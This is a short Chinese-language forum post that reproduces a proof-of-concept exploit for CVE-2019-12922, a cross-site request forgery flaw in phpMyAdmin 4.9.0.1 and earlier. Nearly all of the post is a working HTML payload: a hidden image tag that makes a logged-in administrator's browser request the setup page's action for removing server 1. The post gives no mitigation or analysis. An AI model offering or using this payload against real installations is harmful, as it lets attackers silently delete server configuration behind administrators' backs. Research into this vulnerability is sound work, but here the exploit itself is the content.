90_ 发表于 2019-9-20 23:06:47

phpMyAdmin 4.9.0.1 CSRF

CVE-ID: CVE-2019-12922

phpMyAdmin <= 4.9.0.1

Exploit CSRF - Deleting main server
<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />
页: [1]
查看完整版本: phpMyAdmin 4.9.0.1 CSRF